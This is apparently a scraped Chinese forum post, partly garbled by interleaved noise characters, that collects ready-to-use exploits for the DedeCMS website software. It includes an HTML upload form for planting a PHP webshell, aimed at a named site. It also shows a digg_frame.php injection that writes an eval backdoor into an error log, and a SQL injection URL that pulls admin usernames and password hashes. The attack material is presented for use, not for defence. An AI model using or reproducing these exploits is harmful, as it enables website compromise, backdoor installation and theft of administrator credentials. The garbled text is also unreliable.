7 _# {; z# `' t! M. a% \: p& C) H9 D. u" d C3 H- u
; d4 u1 I, Z# `. ?
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞8 N! O' D. \7 {1 c: A
<html>
/ _6 A3 X. K% a<head>& R2 F5 |2 r+ |5 f2 v0 s
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>( @) l# e6 c' j& T- j! y8 U# C
</head>
, N5 Y! w4 N* A. q<body style="FONT-SIZE: 9pt">% X1 B/ a4 Z* x$ c) d$ `! }
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
k, h* G' y+ G8 B<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
3 Z1 q; T9 K5 P1 a' ]<input type='hidden' name='activepath' value='/data/cache/' />" J9 ~8 v) V7 e( U7 b" R. y) S) q* F4 X
<input type='hidden' name='cfg_basedir' value='../../' />
# M0 o& X3 L0 U4 t<input type='hidden' name='cfg_imgtype' value='php' />! A* P! r+ k/ o
<input type='hidden' name='cfg_not_allowall' value='txt' /> d1 Z' P" ^# I0 x; z
<input type='hidden' name='cfg_softtype' value='php' />8 Q9 C- I4 F2 Z8 S8 x1 J6 E
<input type='hidden' name='cfg_mediatype' value='php' />( \ Q) e/ i$ A0 i1 L9 v D7 T6 I
<input type='hidden' name='f' value='form1.enclosure' />6 Q6 k: N9 ]1 |2 x9 W1 x, `- D F
<input type='hidden' name='job' value='upload' />8 M1 ~. }1 z {( F
<input type='hidden' name='newname' value='fly.php' />
* _# r. x- A3 g; k5 v# ZSelect U Shell <input type='file' name='uploadfile' size='25' />
. h" n( k* @4 H<input type='submit' name='sb1' value='确定' />
0 p: ~+ J! d3 I: J6 K$ g9 ^4 \</form>
M4 q0 k2 P5 F- h<br />It's just a exp for the bug of Dedecms V55...<br />* _1 S x; i* |4 `
Need register_globals = on...<br />
3 y" `/ R) Q5 }Fun the game,get a webshell at /data/cache/fly.php...<br />, k1 Z) o% g; D
</body>
" F9 W% [- i; z! t1 K</html>- L Z3 @6 l7 e
: J1 Z4 I" F1 C/ Z2 l$ j. F/ b! k
3 O/ ^+ E3 s2 ]* y% }+ `3 @/ S
1 u5 d9 X0 M7 M" @
3 r b8 [5 k1 }$ x: K7 X
; @7 Q1 l$ x: L4 }' G
6 w1 c8 Y; r3 G2 i4 q$ y
* w) S, C; a2 {* Y% ?! | m
@' v( ~9 W" B! ]0 d
/ o2 n* B% u: \8 X7 C* M/ Q8 b( j# l4 G5 i2 J' X5 W$ f) B
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
: i7 E( {4 g5 W: Q* N利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
% U# g8 W2 i t3 x, j. o/ \1. 访问网址:
9 F$ ?% w% ?) k* h( k' Phttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
3 g7 Q; r: V0 U1 j可看见错误信息
% S5 c# H8 f; J _3 ?
3 @( n) m4 P, }
/ |; [: {: t# i" Y$ W2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
& z6 Z1 \; p4 [- [int(3) Error: Illegal double '1024e1024' value found during parsing
4 v) u9 k1 |- k; ]Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>+ ]; C9 }$ \! N4 o' f; J3 R
" M( H! W( N& ]1 K
0 [7 k1 C n+ x( z8 S% x3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是( c0 D; k! u d$ w
9 @- j3 Q" c8 \/ [) ~6 v4 r3 t4 y9 ]2 |# h6 q
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>4 E* ?" ^* F- v& V
0 A2 B- D' E8 ?. g8 i+ z# T
# @0 U2 c& }. t: g按确定后的看到第2步骤的信息表示文件木马上传成功.0 c" S% q" z: ~) `2 _( Q/ |+ R+ D% x
; X4 p p" \- ^. F/ ^& H
$ x/ s5 b7 l3 E H) c' {' {! y6 b2 j0 [) O" d
# Z4 B, T; z% | F$ X# H/ f/ v
0 O5 j8 y* @# M5 l: a$ i! S# y/ W+ z) Z0 a" Z$ r* y5 h
8 a2 S0 r0 {- s) h
; ?0 m3 l5 y, a9 g4 ~4 g# t9 ?5 n3 G! P- f& @0 R
" e& X1 f( L0 O, c; T0 ]9 r
5 A; ?) E# X5 Q5 l+ n* _
( T7 d0 H+ q* H$ `" V" G织梦(DedeCms)plus/infosearch.php 文件注入漏洞 [# g1 g: t% v' Y! C. v: W
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对